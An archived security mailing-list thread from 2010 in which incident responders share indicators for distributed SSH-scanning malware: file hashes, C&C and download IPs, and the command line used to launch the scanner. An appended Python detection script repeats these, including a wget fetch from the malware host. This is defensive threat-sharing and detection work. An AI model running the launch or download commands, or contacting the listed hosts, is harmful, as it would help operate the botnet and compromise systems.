[nsp-sec] distributed ssh scanners again
Smith, Donald
Donald.Smith at qwest.com
Wed Nov 3 13:31:11 EDT 2010
dd_ssh appears to be based on this Libssh client side library based on this string found in it.
0.4.3 (c) 2003-2008 Aris Adamantiadis (aris at 0xbadc0de.be) Distributed under the
LGPL, please refer to COPYINGfile for information about your rights
barbut is a version of Kaiten.
http://securityresponse.symantec.com/security_response/writeup.jsp?docid=2006-021417-0144-99
(coffee != sleep) & (!coffee == sleep)
Donald.Smith at qwest.com gcia
> >> -----Original Message-----
> >> From: Torsten Voss [mailto:voss at dfn-cert.de]
> >> Sent: Wednesday, November 03, 2010 10:13 AM
> >> To: Smith, Donald
> >> Cc: 'nsp-security at puck.nether.net'
> >> Subject: Re: [nsp-sec] distributed ssh scanners again
> >>
> > I thought it too, but there was no phpmyadmin installed on the
> > system. It is not
> > clear which vulnerability was used.
> >
> > Sure, you can share the information with your customers.
> >
> > Cheers,
> > Torsten
> >
> > On 03.11.2010 17:04, Smith, Donald wrote:
> >>>> Torsten, is it ok to share the fact that this is probably
> > due to a vulnerable version of phpmyadmin internally and with
> > customers?
> >>>>
> >>>> (coffee != sleep) & (!coffee == sleep)
> >>>> Donald.Smith at qwest.com gcia
> >>>>
> >>>>> -----Original Message-----
> >>>>> From: nsp-security-bounces at puck.nether.net
> >>>>> [mailto:nsp-security-bounces at puck.nether.net] On Behalf Of
> >>>>> Torsten Voss
> >>>>> Sent: Wednesday, November 03, 2010 9:44 AM
> >>>>> To: nsp-security at puck.nether.net
> >>>>> Subject: Re: [nsp-sec] distributed ssh scanners again
> >>>>>
> >>>>> ----------- nsp-security Confidential --------
> >>>>>
> >>>> Hi,
> >>>>
> >>>> we've received the malware from a compromised system:
> >>>>
> >>>> The malware was started similarly to the last one in summer:
> >>>>
> >>>> PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;/tmp/dd_ssh 300
> >>>> 217.79.190.53 2 2>/dev/null >/dev/null
> >>>>
> >>>> 217.79.190.53 is probably the C&C server for the distributed
> > ssh scans
> >>>>
> >>>> The initial malware was probably downloaded at
> >>>> http://195.69.220.2/a.txt
> >>>>
> >>>> Three files were found:
> >>>> 60ccf6902bcc37550954383be1461041 barbut
> >>>> 3f25289959d9fecc72cf24d2e300c97b dd_ssh
> >>>> 30a1e1ae9d573b2daceb71f9ec8c0ce8 dtdss
> >>>>
> >>>> IP 195.69.220.2 is hardcoded in the dtdss file
> >>>> IP 217.79.181.30 is included in the barbut file
> >>>>
> >>>> If someone would like a copy, please send us an email.
> >>>>
> >>>> Kind regards,
> >>>> Torsten, AS680
> >>>>
> > _______________________________________________
> > nsp-security mailing list
> > nsp-security at puck.nether.net
> > https://puck.nether.net/mailman/listinfo/nsp-security
> >>>>>
> > Please do not Forward, CC, or BCC this E-mail outside of the
> > nsp-security
> > community. Confidentiality is essential for effective
> > Internet security counter-measures.
> > _______________________________________________
> >>>>>
> >
> >>>> This communication is the property of Qwest and may contain
> >>>> confidential or
> >>>> privileged information. Unauthorized use of this
> >>>> communication is strictly
> >>>> prohibited and may be unlawful. If you have received this
> >>>> communication
> >>>> in error, please immediately notify the sender by reply
> >>>> e-mail and destroy
> >>>> all copies of the communication and any attachments.
> >
> --
> Dipl.-Ing.(FH) Torsten Voss (Incident Response Team), Phone
> +49 40 808077-634
>
> DFN-CERT Services GmbH, https://www.dfn-cert.de, Phone +49
> 40 808077-590
> Sitz / Register: Hamburg, AG Hamburg, HRB 88805, Ust-IdNr.:
> DE 232129737
> Sachsenstrasse 5, 20097 Hamburg/Germany, CEO: Dr. Klaus-Peter
> Kossakowski
>
> Automatic warnings
> https://www.cert.dfn.de/autowarn
>
>
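Added example, not code from the thread or from either CERT: a small Python triage check built only from the indicators Torsten reported above (the three MD5s and file names, the launch line shape `/tmp/dd_ssh <seconds> <C&C ip> <count>`, and the three IPs). It hashes files under a directory against the reported MD5s and flags command lines (from ps output or shell history) that match the launch shape or reference a reported IP; the sample command lines and the stand-in file in `demo()` are constructed here, not captured data.

```python
import hashlib
import os
import re
import tempfile
# Indicators exactly as reported in Torsten's message: MD5 -> file name, and the reported IPs.
KNOWN_MD5 = {
    "60ccf6902bcc37550954383be1461041": "barbut",
    "3f25289959d9fecc72cf24d2e300c97b": "dd_ssh",
    "30a1e1ae9d573b2daceb71f9ec8c0ce8": "dtdss",
}
KNOWN_IPS = {"217.79.190.53", "195.69.220.2", "217.79.181.30"}
# Launch shape from the thread: <path>/dd_ssh <seconds> <C&C ip> <count>
LAUNCH_RE = re.compile(r"(?:^|[;\s])(?P<path>[^\s;]*dd_ssh)\s+\d+\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+\d+")
IP_RE = re.compile(r"(?<![\d.])\d{1,3}(?:\.\d{1,3}){3}(?![\d.])")

def scan_dir(directory, known=KNOWN_MD5):
    """Return (path, reported_name) for every file under directory whose MD5 is in known."""
    hits = []
    for root, _, files in os.walk(directory):
        for fname in files:
            p = os.path.join(root, fname)
            with open(p, "rb") as f:
                name = known.get(hashlib.md5(f.read()).hexdigest())
            if name:
                hits.append((p, name))
    return hits

def check_cmdlines(cmdlines):
    """Flag the dd_ssh launch shape and any whole-token reference to a reported IP."""
    findings = []
    for line in cmdlines:
        m = LAUNCH_RE.search(line)
        if m:
            findings.append(("launch_pattern", m.group("path"), m.group("ip")))
        for ip in sorted(KNOWN_IPS & set(IP_RE.findall(line))):
            findings.append(("known_ip", ip))
    return findings
# Constructed command lines (as they might appear in ps output or shell history), not captured data.
SAMPLE_CMDLINES = [
    "PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;/tmp/dd_ssh 300 217.79.190.53 2 2>/dev/null >/dev/null",
    "/usr/sbin/sshd -D",
    "wget http://195.69.220.2/a.txt",
]
def demo():
    # The file check uses a constructed stand-in whose hash is added to the known set (we do not have the sample).
    data = b"constructed stand-in, not the real sample\n"
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "dd_ssh"), "wb") as f:
            f.write(data)
        file_hits = scan_dir(d, dict(KNOWN_MD5, **{hashlib.md5(data).hexdigest(): "dd_ssh (stand-in)"}))
    return file_hits, check_cmdlines(SAMPLE_CMDLINES)
```

On a real host, point `scan_dir` at /tmp (where the thread reports dd_ssh was run from) and feed `check_cmdlines` the output of `ps -eo args` or shell history files.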